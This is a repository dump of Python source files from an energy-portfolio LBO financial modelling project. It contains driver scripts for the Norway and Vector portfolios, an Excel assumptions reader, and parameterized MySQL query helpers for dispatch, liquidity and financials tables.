    """ get powerplant_df """
    # basis_start_date = date(2017,1,1)
    # basis_end_date = date(2019,12,31)
    # # selected_powerplant_list = ['Joppa_EEI','Fayette','Hanging Rock']
    #
    # """ 2 Calcualate basis data for powerplants """
    # portfolio_basis_result_df, portfolio_basis_detail_df = run_basis_calculation(powerplant_df,basis_start_date, basis_end_date)
    # portfolio_basis_result_df.to_excel("basis_result_prices_loader.xlsx")
    # portfolio_basis_detail_df.to_csv("portfolio_basis_detail_df.csv")
    """ 3 load non-dispatchable plants gross energy margin profile """
    # nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\norway_solar_nuclear_assumptions_v2.xlsx'
    #
    # # portfolio, scenario, version, type, plant_name, assumptions_file_path
    """ Norway nuclears and solar """
    # nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\norway_solar_nuclear_assumptions_v3_0226.xlsx'
    # # portfolio, scenario, version, type, plant_name, assumptions_file_path
    # load_nondispatchable_plants('Norway', 'Norway Nuclear', 'v2', 'nuclear', 'South Texas', nondispatchable_assumptions_file_path)
    # sys.exit()
    """ 4 put lbo assumptions """
    lbo_assumptions_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\Dispatch Model Inputs_Norway_v4_3.18.20.xlsx"
    # Financial statement line items read from the assumptions workbook.
    fsli_list = ['Capacity Revenue','FOM','Taxes','Insurance','Fixed Costs','Hedges','Fixed Fuel Transport','Other Revenue','Ancillary Revenue','Capex']
    lbo_assumptions_scenario = 'Norway'
    lbo_assumptions_version = 'v4'
    # load_lbo_assumptions(lbo_assumptions_file_path, 'Norway', lbo_assumptions_scenario, lbo_assumptions_version, fsli_list, overwrite_option=True)
    # sys.exit()
    """ 5 run financials """
    """ 5.1 get lbo assumptions from KEAN3 """
    lbo_assumptions_df = get_lbo_assumptions('Norway', lbo_assumptions_scenario, lbo_assumptions_version)
    """ 5.2 get dispatch from KEAN3 """
    dispatch_scenario = 'Norway 20200226'
    dispatch_version = 'v1'
    dispatch_df = get_dispatch(portfolio, dispatch_scenario, dispatch_version)
    """ 5.3 build lbo financials """
    lbo_financials_scenario = 'Norway'
    lbo_financials_version = 'v7'
    entity_list = powerplant_df['name']
    # Sanity-check record counts before the (long) financials build.
    print ("number of powerplants: ", len(powerplant_df))
    print ("number of dispatch records: ", len(dispatch_df))
    print ("number of lbo assumptions records: ", len(lbo_assumptions_df))
    lbo_financials_df = lbo.build_lbo_financials(powerplant_df, portfolio, lbo_financials_scenario, lbo_financials_version, dispatch_df, lbo_assumptions_df)
    # lbo_financials_df.to_csv("lbo_financials_df.csv")
    """ 5.4 put lbo financials to KEAN3 """
    put_financials_lbo(lbo_financials_df, portfolio, lbo_financials_scenario, lbo_financials_version, True)
    """ 5.5 put scenario master information to KEAN3 """
    # Lineage records: which assumption/dispatch scenarios produced this
    # financials output (one row per input source).
    ready_to_kean_sm_df = pd.DataFrame(columns=['portfolio',
                                                'output_module',
                                                'output_table',
                                                'output_scenario',
                                                'output_version',
                                                'input_module',
                                                'input_table',
                                                'input_scenario',
                                                'input_version',
                                                'scenario_level',
                                                'comment'],
                                       data=[[portfolio, 'financials', 'financials_lbo',
                                              lbo_financials_scenario, lbo_financials_version,
                                              'lbo_assumptions', 'EXCEL', 'LBO Assumptions', lbo_assumptions_file_path.split(".")[0][-2:], 'scenario', lbo_assumptions_file_path],
                                             [portfolio, 'financials', 'financials_lbo',
                                              lbo_financials_scenario, lbo_financials_version,
                                              'dispatch', 'dispatch', dispatch_scenario, dispatch_version, 'scenario_master', '']])
    # Replace any previous lineage rows for this output scenario/version.
    delete_scenario_master(portfolio, lbo_financials_scenario, lbo_financials_version, 'financials', 'financials_lbo')
    insert_scenario_master(ready_to_kean_sm_df)
    #
    """ 5.6 get lbo financials from KEAN3 and write regular report """
    # display simple report for lbo_financials
    lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
    dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
    lbo.write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio)
    """ diff report """
# Driver script for the Vector portfolio LBO run.  NOTE: the guard compares
# against '__main__Vector', which is never true -- this whole branch is
# intentionally disabled dead code, kept as a runnable recipe; rename the
# guard back to '__main__' to re-enable it.
if __name__ == '__main__Vector':
    portfolio = 'Vector'
    portfolio_obj = Portfolio('Vector')
    # Powerplant master data for the portfolio, used by several steps below.
    powerplant_df = get_powerplants_by_portfolio(portfolio)
    # powerplant_df.to_csv("ppd.csv")
    """ 1 Convert PCUC file and save it to KEAN """
    # plant_tech_master_file = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Vector\Vector plant char assumption_input 2.6.20_Gas convertion.xlsx"
    # pc_date_start = date(2020, 1, 1)
    # pc_date_end = date(2027,12,31)
    # pc_scenario = 'Vector Gas Conversion'
    # pc_version = 'v1'
    # # run_convert_uc(plant_tech_master_file, pc_date_start, pc_date_end, pc_scenario, pc_version)
    # run_convert_uc('Vector', pc_date_start, pc_date_end, pc_scenario, pc_version, plant_list=['Kincaid','Miami Fort 7 & 8','Zimmer'], plant_tech_master_file=plant_tech_master_file, push_to_powerplant=False, push_to_technology=False, push_to_plant_characteristics=True)
    # sys.exit()
    #
    """ get powerplant_df """
    # basis_start_date = date(2017,1,1)
    # basis_end_date = date(2019,12,31)
    # # selected_powerplant_list = ['Joppa_EEI','Fayette','Hanging Rock']
    #
    # """ 2 Calcualate basis data for powerplants """
    # portfolio_basis_result_df, portfolio_basis_detail_df = run_basis_calculation(powerplant_df,basis_start_date, basis_end_date)
    # portfolio_basis_result_df.to_excel("basis_result_prices_loader.xlsx")
    # portfolio_basis_detail_df.to_csv("portfolio_basis_detail_df.csv")
    """ 3 load non-dispatchable plants gross energy margin profile """
    # nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\norway_solar_nuclear_assumptions_v2.xlsx'
    #
    # # portfolio, scenario, version, type, plant_name, assumptions_file_path
    # load_nondispatchable_plants(portfolio, 'Vector Solar', 'v2', 'solar', 'Upton 2', nondispatchable_assumptions_file_path)
    # load_nondispatchable_plants('Norway', 'Norway Nuclear Modified Power', 'v1', 'nuclear', 'South Texas', nondispatchable_assumptions_file_path)
    """ Vector nuclears and solar """
    # nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Vector\solar_nuclear_assumptions_v7.2_0313.xlsx'
    # #
    # # # portfolio, scenario, version, type, plant_name, assumptions_file_path
    # load_nondispatchable_plants('Vector', 'Vector Nuclear', 'v7.2', 'nuclear', 'Comanche Peak', nondispatchable_assumptions_file_path)
    # sys.exit()
    """ 4 put lbo assumptions """
    lbo_assumptions_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Vector\Dispatch Model Inputs_Margin_for V6 and V7_v10.xlsx"
    # fsli_list = ['ICAP', 'Capacity Revenue','FOM','Taxes','Insurance','Fixed Costs','Hedges','Fixed Fuel Transport','Other Revenue','Ancillary Revenue','Capex']
    lbo_assumptions_scenario = 'Vector'
    lbo_assumptions_version = 'v10'
    # load_lbo_assumptions(lbo_assumptions_file_path, 'Vector', lbo_assumptions_scenario, lbo_assumptions_version, fsli_list, overwrite_option=True)
    #
    # sys.exit()
    """ 5 run financials """
    """ 5.1 get lbo assumptions from KEAN3 """
    lbo_assumptions_df = get_lbo_assumptions('Vector', lbo_assumptions_scenario, lbo_assumptions_version)
    print (len(lbo_assumptions_df))
    """ 5.2 get dispatch from KEAN3 """
    dispatch_scenario = 'Vector 20200226 Adjusted'
    dispatch_version = 'v4.2'
    dispatch_df = get_dispatch(portfolio, dispatch_scenario, dispatch_version)
    """ 5.3 build lbo financials """
    lbo_financials_scenario = 'Vector'
    lbo_financials_version = 'v12.2'
    entity_list = powerplant_df['name']
    lbo_financials_df = lbo.build_lbo_financials(powerplant_df, portfolio, lbo_financials_scenario, lbo_financials_version, dispatch_df, lbo_assumptions_df)
    # lbo_financials_df.to_csv("lbo_financials_df.csv")
    """ 5.4 put lbo financials to KEAN3 """
    put_financials_lbo(lbo_financials_df, portfolio, lbo_financials_scenario, lbo_financials_version, True)
    """ 5.5 put scenario master information to KEAN3 """
    # Lineage records: which assumption/dispatch scenarios produced this
    # financials output (one row per input source).
    ready_to_kean_sm_df = pd.DataFrame(columns=['portfolio',
                                                'output_module',
                                                'output_table',
                                                'output_scenario',
                                                'output_version',
                                                'input_module',
                                                'input_table',
                                                'input_scenario',
                                                'input_version',
                                                'scenario_level',
                                                'comment'],
                                       data=[[portfolio, 'financials', 'financials_lbo',
                                              lbo_financials_scenario, lbo_financials_version,
                                              'lbo_assumptions', 'lbo_assumptions', 'LBO Assumptions', lbo_assumptions_file_path.split(".")[0][-2:], 'scenario', lbo_assumptions_file_path],
                                             [portfolio, 'financials', 'financials_lbo',
                                              lbo_financials_scenario, lbo_financials_version,
                                              'dispatch', 'dispatch', dispatch_scenario, dispatch_version, 'scenario_master', 're-adjust curves based on info from BX 0306']])
    # Replace any previous lineage rows for this output scenario/version.
    delete_scenario_master(portfolio, lbo_financials_scenario, lbo_financials_version, 'financials', 'financials_lbo')
    insert_scenario_master(ready_to_kean_sm_df)
    #
    """ 5.6 get lbo financials from KEAN3 and write regular report """
    # display simple report for lbo_financials
    lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
    dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
    lbo.write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio)
    """ diff report """
    # portfolio = 'Norway'
    # first_lbo_scenario = 'Norway'
    # first_lbo_version = 'v3'
    # second_lbo_scenario = 'Norway'
    # second_lbo_version = 'v1'
    #
    # first_lbo_financials_df = get_financials_lbo(portfolio, first_lbo_scenario, first_lbo_version)
    # second_lbo_financials_df = get_financials_lbo(portfolio, second_lbo_scenario, second_lbo_version)
    # lbo.write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df)
    # """ graphs output """
    # portfolio = 'Vector'
    # lbo_financials_scenario = 'Vector'
    # lbo_financials_version = 'v7.1'
    # lbo_graph_output_template = 'Dispatch Output_Graphs template.xlsx'
    # lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
    # lbo.write_lbo_graph_report('Dispatch Output_Graphs template.xlsx', lbo_financials_df)
    # #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,733 | changliukean/KEAN3 | refs/heads/master | /utility/lboUtils.py | import pandas as pd
import sys
def read_excel_lbo_inputs(file_path, load_fsli_list):
    """Read LBO assumption inputs for a list of FSLIs from an Excel workbook.

    Each FSLI is read from a tab named ``Value_<FSLI with underscores>``.
    The entity-name column header on that tab is
    ``Output_<FSLI with underscores>`` and the adjacent unnamed column holds
    the unit; the first three rows are header/formatting rows and are
    dropped.  The wide monthly layout is melted into long form.

    FIX: the original accumulated rows with ``DataFrame.append`` inside the
    loop (deprecated and removed in pandas 2.0, and quadratic); the per-FSLI
    frames are now collected and concatenated once.

    Parameters
    ----------
    file_path : str
        Path to the assumptions workbook.
    load_fsli_list : list[str]
        FSLI names (e.g. 'Capacity Revenue'), one tab each.

    Returns
    -------
    pandas.DataFrame
        Long-format frame with columns: entity, unit, period, value, fsli.
    """
    melted_frames = []
    for load_fsli in load_fsli_list:
        # Spaces in the FSLI name become underscores in the tab/header names.
        fsli_key = "_".join(load_fsli.split(" "))
        fsli_tab_name = "Value_" + fsli_key
        print (fsli_tab_name)
        first_cell_name = "Output_" + fsli_key
        temp_raw_fsli_inputs_df = pd.read_excel(file_path, sheet_name=fsli_tab_name)
        temp_raw_fsli_inputs_df.rename(columns={'Unnamed: 1':'unit', first_cell_name:'entity'}, inplace=True)
        # Drop the three leading header/formatting rows of each tab.
        temp_raw_fsli_inputs_df = temp_raw_fsli_inputs_df.iloc[3:]
        melted_raw_fsli_inputs_df = pd.melt(temp_raw_fsli_inputs_df,
                                            id_vars=['entity','unit'],
                                            value_vars=[item for item in list(temp_raw_fsli_inputs_df.columns) if item != 'entity' and item != 'unit'],
                                            var_name='period',
                                            value_name='value')
        melted_raw_fsli_inputs_df['fsli'] = load_fsli
        melted_frames.append(melted_raw_fsli_inputs_df)
    return pd.concat(melted_frames) if melted_frames else pd.DataFrame()
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,734 | changliukean/KEAN3 | refs/heads/master | /lbo_oob_testcases.py | from utility.dispatchUtils import load_pp_tech_info, convert_uc_dataframe, load_solar_dispatch, load_nuclear_dispatch
from datetime import datetime, date
from database.dbPCUC import put_characteristics
from database.dbDispatch import put_dispatch, get_dispatch
from database.dbLBO import put_powerplant, put_technology, get_powerplant, get_technology, put_financials_lbo, get_financials_lbo, put_lbo_assumptions, get_lbo_assumptions
from database.dbScenarioMaster import insert_scenario_master, delete_scenario_master
from utility.lboUtils import read_excel_lbo_inputs
from lbo import lbo
from model.Entity import Powerplant
from model.Portfolio import Portfolio
from utility.dateUtils import get_month_list
import numpy as np
import sys
import pandas as pd
from reportwriter.ReportWriter import ReportWriter
# Object-oriented ("oob") variant of the LBO driver: the same workflow as
# lbo_testcases.py, but driven through Portfolio methods.  Triple-quoted
# strings are section markers only (no-op statement expressions).
if __name__ == '__main__':
    portfolio = Portfolio('Norway')
    """ Step 1, update powerplants information under portfolio """
    plant_tech_master_file = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\pcuc\Norway plant char assumption_input v12.xlsx"
    # portfolio.update_powerplants_fromexcel(plant_tech_master_file, additional=False)
    portfolio.get_powerplant_fromdb() # pick one of the two statements: load from KEAN when the data is already there, otherwise load from the Excel file
    # sys.exit()
    """ Step 2, load/update pcuc data """
    pc_date_start = date(2020, 1, 1)
    pc_date_end = date(2027,12,31)
    pc_scenario = 'Norway Converted'
    pc_version = 'v1'
    technology_df = get_technology('Norway')
    ready_to_kean_converted_pc_df = portfolio.bulk_convert_uc_dataframe(technology_df, pc_scenario, pc_version, pc_date_start, pc_date_end, push_to_kean=True) # the push_to_kean switch defaults to False
    """ Step 3, bulk calculate basis information for plants under a portfolio """
    portfolio.get_powerplant_fromdb()
    basis_start_date = date(2017,1,1)
    basis_end_date = date(2019,12,31)
    to_excel = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lmps\calculated_basis\Norway Basis_0221.xlsx"
    portfolio.bulk_prepare_basis(basis_start_date, basis_end_date, dart='Day Ahead', market='All', to_database_option=False, to_excel=to_excel)
    # #
    # #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,735 | changliukean/KEAN3 | refs/heads/master | /database/dbLiquidity.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,DATABASE, PROD_DATABASE, config_connection
from sqlalchemy import create_engine
import pandas as pd
from datetime import datetime, date
def get_financials(portfolio, scenario, version, financials_table):
    """Fetch all rows of a financials table for one portfolio/scenario/version.

    Parameters
    ----------
    portfolio, scenario, version : str
        Key columns of the financials table.
    financials_table : str
        Name of the financials table to read (e.g. 'financials_lbo').

    Returns
    -------
    pandas.DataFrame

    Raises
    ------
    ValueError
        If ``financials_table`` is not a plain identifier.
    """
    # SECURITY: table names cannot be bound as SQL parameters, so the value
    # is interpolated into the statement text.  Restrict it to a plain
    # identifier to prevent SQL injection through this argument.
    if not financials_table.isidentifier():
        raise ValueError("invalid financials table name: %r" % (financials_table,))
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """
    SELECT * FROM """ + financials_table + """
    where
    portfolio = %s
    and
    scenario = %s
    and
    version = %s;
    """
    financials_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
    connection_instance.close()
    return financials_df
def get_scenario_assumptions(portfolio, scenario, version):
    """Return every scenario_assumption row keyed by portfolio/scenario/version."""
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT * FROM scenario_assumption
    where
    portfolio = %s
    and
    scenario = %s
    and
    version = %s;
    """
    query_params = [portfolio, scenario, version]
    result_df = pd.read_sql(query, conn, params=query_params)
    conn.close()
    return result_df
def get_capital_structure(portfolio, scenario, version):
    """Return the capital_structure rows for one portfolio/scenario/version."""
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT * FROM capital_structure
    where
    portfolio = %s
    and
    scenario = %s
    and
    version = %s;
    """
    query_params = [portfolio, scenario, version]
    result_df = pd.read_sql(query, conn, params=query_params)
    conn.close()
    return result_df
# def get_revolver_change(instrument_id):
# connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
# sql_statement = """
# SELECT * FROM debt_activity
# where
# instrument_id = %s;
# """
#
# debt_activity_df = pd.read_sql(sql_statement, connection_instance, params=[instrument_id])
# connection_instance.close()
# return debt_activity_df
def get_debt_activity(instrument_id):
    """Return all debt_activity rows for one debt instrument."""
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT * FROM debt_activity
    where
    instrument_id = %s;
    """
    result_df = pd.read_sql(query, conn, params=[instrument_id])
    conn.close()
    return result_df
def get_waterfall(portfolio, scenario, version):
    """Return the cash-waterfall rows for one portfolio/scenario/version."""
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT * FROM waterfall
    where
    portfolio = %s
    and
    scenario = %s
    and
    version = %s
    ;
    """
    query_params = [portfolio, scenario, version]
    result_df = pd.read_sql(query, conn, params=query_params)
    conn.close()
    return result_df
def get_distributions(portfolio):
    """Return the portfolio's distributions as a ``{date: amount}`` mapping."""
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT date, amount FROM distribution
    where
    portfolio = %s;
    """
    result_df = pd.read_sql(query, conn, params=[portfolio])
    conn.close()
    # Collapse the two-column frame into a date -> amount dict.
    return result_df.set_index('date')['amount'].to_dict()
def get_paid_tax(portfolio, as_of_date):
    """Return permitted tax distributions paid through ``as_of_date``.

    Result is a ``{date: amount}`` mapping built from the distribution table.
    """
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT date, amount FROM distribution
    where
    portfolio = %s
    and
    type = 'permitted tax distribution'
    and
    date <= %s
    ;
    """
    result_df = pd.read_sql(query, conn, params=[portfolio, as_of_date])
    conn.close()
    # Collapse the two-column frame into a date -> amount dict.
    return result_df.set_index('date')['amount'].to_dict()
def get_cash_balance(portfolio, forecast_start_month):
    """Return actual cash balances recorded before the forecast start month."""
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    query = """
    SELECT * FROM cash_balance
    where
    portfolio = %s
    and
    as_of_date < %s
    ;
    """
    query_params = [portfolio, forecast_start_month]
    result_df = pd.read_sql(query, conn, params=query_params)
    conn.close()
    return result_df
def get_asset_depreciation(portfolio):
    """Return asset_depreciation rows for a portfolio.

    FIX: the original never closed the connection (resource leak); it is now
    closed after the query, consistent with the other getters in this module.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """ SELECT * FROM asset_depreciation where portfolio = %s; """
    asset_depreciation_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio])
    connection_instance.close()
    return asset_depreciation_df
def get_swap(portfolio, instrument_id):
    """Return swap-rate rows for one portfolio/instrument.

    FIX: the original never closed the connection (resource leak); it is now
    closed after the query, consistent with the other getters in this module.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """ SELECT * FROM swap
    where portfolio = %s
    and instrument_id = %s
    ;
    """
    swap_rates_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, instrument_id])
    connection_instance.close()
    return swap_rates_df
def get_curves(scenario, version):
    """Return price-curve rows for one scenario/version.

    FIX: the original never closed the connection (resource leak); it is now
    closed after the query, consistent with the other getters in this module.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """ SELECT * FROM curve
    where scenario = %s
    and version = %s
    ;
    """
    curves_df = pd.read_sql(sql_statement, connection_instance, params=[scenario, version])
    connection_instance.close()
    return curves_df
def get_rw_headers(name='Default'):
    """Return report-writer header rows for the named header set.

    FIX: the original never closed the connection (resource leak); it is now
    closed after the query, consistent with the other getters in this module.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """ SELECT * FROM rw_headers
    where name = %s;
    """
    rw_headers_df = pd.read_sql(sql_statement, connection_instance, params=[name])
    connection_instance.close()
    return rw_headers_df
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,736 | changliukean/KEAN3 | refs/heads/master | /database/dbDispatch.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,PROD_DATABASE,config_connection
from sqlalchemy import create_engine
import pandas as pd
def get_dispatch(portfolio, scenario, version):
    """Return dispatch rows for one portfolio (stored in the ``company``
    column) / scenario / version.

    FIX: the original never closed the connection (resource leak); it is now
    closed after the query, consistent with put_dispatch below.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, PROD_DATABASE)
    sql_statement = "Select * from dispatch where company = %s and scenario = %s and version = %s; "
    dispatch_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
    connection_instance.close()
    return dispatch_df
def put_dispatch(portfolio, scenario, version, ready_to_kean_dispatch_df):
    """Replace all dispatch rows for (portfolio, scenario, version).

    Deletes any existing rows for the key, then bulk-inserts the new frame
    in chunks of 3000 rows via SQLAlchemy.

    FIX: the DELETE statement was previously built by string concatenation
    of the key values, which is vulnerable to SQL injection and breaks on
    values containing quotes; it is now a parameterized query.  The manual
    3000-row insert loop is replaced by ``to_sql(chunksize=3000)``, which
    batches identically.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, PROD_DATABASE)
    delete_sql_statment = """
    DELETE FROM dispatch
    where
    company = %s
    and
    scenario = %s
    and
    version = %s;
    """
    cursor = connection_instance.cursor()
    cursor.execute(delete_sql_statment, (portfolio, scenario, version))
    connection_instance.commit()
    connection_instance.close()
    engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + PROD_DATABASE
    engine = create_engine(engine_str, encoding='latin1', echo=True)
    # Insert in 3000-row batches (pandas handles the chunking internally).
    ready_to_kean_dispatch_df.to_sql(name='dispatch', con=engine, if_exists='append', index=False, chunksize=3000)
# #
